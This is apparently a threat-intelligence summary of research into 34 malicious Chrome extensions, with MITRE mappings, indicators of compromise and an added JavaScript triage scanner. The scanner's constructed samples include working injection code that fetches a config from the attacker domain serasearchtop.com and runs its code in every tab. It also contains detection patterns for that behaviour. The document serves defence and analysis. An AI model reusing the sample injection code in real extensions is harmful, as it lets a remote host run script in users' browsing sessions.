Two weeks after reporting the PDF Toolbox extension, researchers uncovered a broader campaign: 34 malicious Chrome Web Store extensions with a combined 87 million users, using obfuscated code and remote configuration to inject JavaScript into visited sites. The malware variants masquerade as the Polyfill or Day.js libraries, fetch their configuration from serasearchtop.com, and then use the chrome.tabs API to inject the configured JavaScript into every page the user visits.
#serasearchtop #PDFToolbox #ZoomPlus #AutoskipForYoutube #CrystalAdBlock #BriskVPN #ImageDownloadCenter #CharmSearching #ChromeWebStore
Keypoints
- 34 malicious extensions identified in the campaign, with 87 million users as of 2023-06-01 (previously 18 extensions and 55 million users).
- Two code variants disguise themselves as legitimate libraries (Polyfill and Day.js) and load data from serasearchtop.com.
- Malware uses chrome.tabs.onUpdated.addListener and chrome.tabs.executeScript to inject arbitrary JavaScript into every visited website.
- The remote configuration data from serasearchtop.com often appears empty in tests, suggesting conditional activation or regional targeting.
- Reviews and user feedback indicate fake reviews and monetization through search result redirection (e.g., references to CharmSearching.com).
- Most extensions were removed from Chrome Web Store by 2023-06-02; a follow-up post discusses technical details.
MITRE Techniques
- [T1036] Masquerading – The extension masquerades as Mozilla’s WebExtension browser API Polyfill. ‘First variant masquerades as Mozilla’s WebExtension browser API Polyfill. The “config” download address is https://serasearchtop.com/cfg//polyfill.json’
- [T1027] Obfuscated/Compressed Files and Information – The malicious code has been added on top of the original module and is more thoroughly obfuscated in newer variants. ‘the code has been obfuscated more thoroughly here’
- [T1059.007] JavaScript – The extensions are meant to inject some arbitrary JavaScript code into every website you visit. ‘So these extensions are meant to inject some arbitrary JavaScript code into every website you visit.’
- [T1105] Ingress Tool Transfer – The extensions download configuration data from serasearchtop.com, e.g., ‘It downloads data from https://serasearchtop.com/cfg//locale.json’
Indicators of Compromise
- [Domain] serasearchtop.com – config data host used by the extensions for polyfill/locale data
- [Domain] CharmSearching.com – domain referenced in historical monetization-related reviews
- [Extension ID] lgjdgmdbfhobkdbcjnpnlmhnplnidkkp – Autoskip for Youtube
- [Extension ID] chmfnmjfghjpdamlofhlonnnnokkpbao – Soundboost
- [Extension ID] lklmhefoneonjalpjcnhaidnodopinib – Crystal Ad block
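As an added example, not code from palant.info or from any of the extensions, the script below triages unpacked extension sources for what the keypoints and IoCs above describe: the chrome.tabs.onUpdated.addListener plus executeScript injection pattern, a remote JSON config fetch, the serasearchtop.com host, and the three listed extension IDs. The three sample extensions (their names, code and the two non-IoC IDs) are constructed for illustration; the "obfuscated" sample only approximates the bracket-notation rewriting that obfuscators produce and is not the real variant's code.

```javascript
// Added example: heuristic triage of unpacked Chrome extensions for the
// remote-config + tab-injection pattern. Not code from palant.info or from
// the extensions; all sample extensions below are constructed.
const KNOWN_BAD_IDS = new Set([
  "lgjdgmdbfhobkdbcjnpnlmhnplnidkkp", // Autoskip for Youtube
  "chmfnmjfghjpdamlofhlonnnnokkpbao", // Soundboost
  "lklmhefoneonjalpjcnhaidnodopinib", // Crystal Ad block
]);
const SUSPECT_HOSTS = ["serasearchtop.com"];

// Obfuscated builds often spell chrome.tabs.x as chrome["tabs"]["x"],
// so both spellings are matched. MV3's chrome.scripting.executeScript is
// included because it is the MV2 chrome.tabs.executeScript equivalent.
const PATTERNS = {
  tabListener: /chrome(?:\.tabs|\[["']tabs["']\])(?:\.onUpdated|\[["']onUpdated["']\])(?:\.addListener|\[["']addListener["']\])/,
  executeScript: /chrome(?:\.(?:tabs|scripting)|\[["'](?:tabs|scripting)["']\])(?:\.executeScript|\[["']executeScript["']\])/,
  remoteJsonConfig: /(?:fetch|XMLHttpRequest)\b[\s\S]{0,200}?https?:\/\/[^"'`\s]+\.json/,
};

// Returns the pattern names (and any suspect host) found in one script.
function scanSource(source) {
  const hits = [];
  for (const [name, re] of Object.entries(PATTERNS)) if (re.test(source)) hits.push(name);
  for (const host of SUSPECT_HOSTS) if (source.includes(host)) hits.push(`suspectHost:${host}`);
  return hits;
}

// ext = { id, name, manifest, files: { filename: source } }
function triageExtension(ext) {
  const reasons = [];
  const isIoc = KNOWN_BAD_IDS.has(ext.id);
  if (isIoc) reasons.push(`id ${ext.id} is a known IoC`);

  const hits = new Set();
  for (const [file, src] of Object.entries(ext.files)) {
    for (const h of scanSource(src)) {
      hits.add(h);
      reasons.push(`${file}: ${h}`);
    }
  }
  const canInject = hits.has("tabListener") && hits.has("executeScript");
  const hasSuspectHost = [...hits].some((h) => h.startsWith("suspectHost:"));
  const remoteControlled = hits.has("remoteJsonConfig") || hasSuspectHost;

  // executeScript into arbitrary sites needs broad host access in the manifest.
  const hostPerms = [...(ext.manifest.permissions || []), ...(ext.manifest.host_permissions || [])];
  const broadHosts = hostPerms.some((p) => p === "<all_urls>" || /^(\*|https?):\/\/\*\//.test(p));
  if (canInject && !broadHosts) reasons.push("injection APIs present but no broad host permission");

  // Legitimate extensions also use these APIs, so the pattern alone only
  // earns a "review"; a remote config source or a known host escalates it.
  let verdict = "clean";
  if (isIoc || (canInject && hasSuspectHost)) verdict = "malicious";
  else if (canInject && remoteControlled) verdict = "suspicious";
  else if (canInject) verdict = "review";
  return { id: ext.id, name: ext.name, verdict, reasons };
}

// Constructed samples (not the real extensions' code). The config URL in the
// first sample is copied from the post's quoted address, path elision included.
const SAMPLES = [
  {
    id: "lgjdgmdbfhobkdbcjnpnlmhnplnidkkp",
    name: "Autoskip for Youtube (constructed code)",
    manifest: { manifest_version: 2, permissions: ["tabs", "<all_urls>"] },
    files: {
      "background.js": `
        var config = {};
        fetch("https://serasearchtop.com/cfg//polyfill.json")
          .then(r => r.json()).then(cfg => { config = cfg; });
        chrome.tabs.onUpdated.addListener((tabId, info) => {
          if (info.status === "complete" && config.code)
            chrome.tabs.executeScript(tabId, { code: config.code });
        });`,
    },
  },
  {
    id: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
    name: "Benign dark mode (constructed)",
    manifest: { manifest_version: 3, permissions: ["storage"] },
    files: { "content.js": `document.documentElement.classList.add("dark");` },
  },
  {
    id: "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb",
    name: "Obfuscated variant (constructed)",
    manifest: { manifest_version: 2, permissions: ["tabs", "*://*/*"] },
    files: {
      "bg.js": `var x=new XMLHttpRequest();x.open("GET","https://example.invalid/locale.json");
        chrome["tabs"]["onUpdated"]["addListener"](function(t){chrome["tabs"]["executeScript"](t,{code:c})});`,
    },
  },
];

for (const r of SAMPLES.map(triageExtension)) console.log(r.verdict, "-", r.name, r.reasons);
```

String matching is only a first pass: the newer variants are obfuscated more thoroughly, so API names may be assembled at runtime and the regexes will miss them, and because the remote config often came back empty in tests, a dynamic check may also show nothing. Treat a hit on the extension ID list or on the serasearchtop.com host as the reliable signal and the code pattern as a reason to look closer.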
Read more: https://palant.info/2023/05/31/more-malicious-extensions-in-chrome-web-store/